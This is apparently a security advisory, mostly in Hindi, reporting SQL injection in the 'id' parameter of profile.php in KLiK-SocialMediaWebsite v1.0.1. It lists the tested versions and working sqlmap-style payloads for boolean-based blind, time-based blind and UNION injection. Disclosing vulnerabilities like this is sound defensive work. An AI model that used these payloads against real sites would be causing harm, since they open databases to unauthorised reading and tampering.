
KLiK-SocialMediaWebsite v1.0.1 में profile.php पर SQL इंजेक्शन की कमजोरियाँ हैं।
KLiK-SocialMediaWebsite v1.0.1 में profile.php पर पैरामीटर id पर SQL इंजेक्शन भेद्यताएं हैं।
KLiK-SocialMediaWebsite v1.0.1 में जब कोई उपयोगकर्ता बनाया जाता है, तो KLiK उपयोगकर्ता पृष्ठ के माध्यम से KLiK पर लोगों को खोजा जा सकता है। profile.php का "id" पैरामीटर मनमाने SQL क्वेरी इंजेक्ट करने के लिए दुरुपयोग किया जा सकता है।
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=27 AND 3227=3227
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#
KLiK SocialMediaWebsite संस्करण v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)
Firefox संस्करण 105
sqlmap संस्करण 1.6.7 स्थिर
:shipit: Grim The Ripper Team by SOSECURE Thailand
संदर्भ: